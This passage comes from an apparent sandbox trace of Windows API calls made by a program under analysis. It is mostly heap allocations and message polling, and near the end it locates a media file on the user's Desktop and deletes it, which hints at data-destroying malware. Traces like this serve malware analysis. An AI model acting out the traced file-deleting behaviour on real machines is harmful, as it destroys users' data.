Flags=0x0, Size=0x8) returned 0x2e54eb8 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0131.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0131.003] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0131.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0131.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.004] FreeLibrary (hLibModule=0x756e0000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0131.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0131.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0131.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0131.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0131.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0131.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0131.005] CloseHandle (hObject=0x2a0) returned 1 [0131.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0131.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0131.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0131.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0131.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0131.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0131.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0131.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0131.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0131.007] CloseHandle (hObject=0x2d0) returned 1 [0131.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0131.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90338 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0131.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0131.332] TranslateMessage (lpMsg=0x8cf708) returned 0 [0131.332] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0131.332] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0131.332] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0131.332] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0131.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0131.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0131.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0131.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0131.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0131.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0131.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0131.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0131.336] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0131.337] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0131.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0131.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0131.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0131.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0131.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0131.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0131.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0131.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0131.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0131.338] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/2a44Hi4EE Lmnc.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a", lpFilePart=0x8cedf4*="2a44Hi4EE Lmnc.m4a") returned 0x2a [0131.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0131.338] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2a44hi4ee lmnc.m4a")) returned 0x20 [0131.338] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f960f0, ftCreationTime.dwHighDateTime=0x1d5e84f, ftLastAccessTime.dwLowDateTime=0x3785f910, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x3785f910, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x1651a, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="2a44Hi4EE Lmnc.m4a", cAlternateFileName="2A44HI~1.M4A")) returned 0xa87390 [0131.338] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2a44hi4ee lmnc.m4a")) returned 1 [0131.693] FindNextFileW (in: hFindFile=0xa87390, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f960f0, ftCreationTime.dwHighDateTime=0x1d5e84f, ftLastAccessTime.dwLowDateTime=0x3785f910, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x3785f910, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x1651a, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="2a44Hi4EE Lmnc.m4a", cAlternateFileName="2A44HI~1.M4A")) returned 0 [0131.694] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0131.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0131.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0131.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0131.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0131.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0131.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0131.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0131.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0131.694] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: 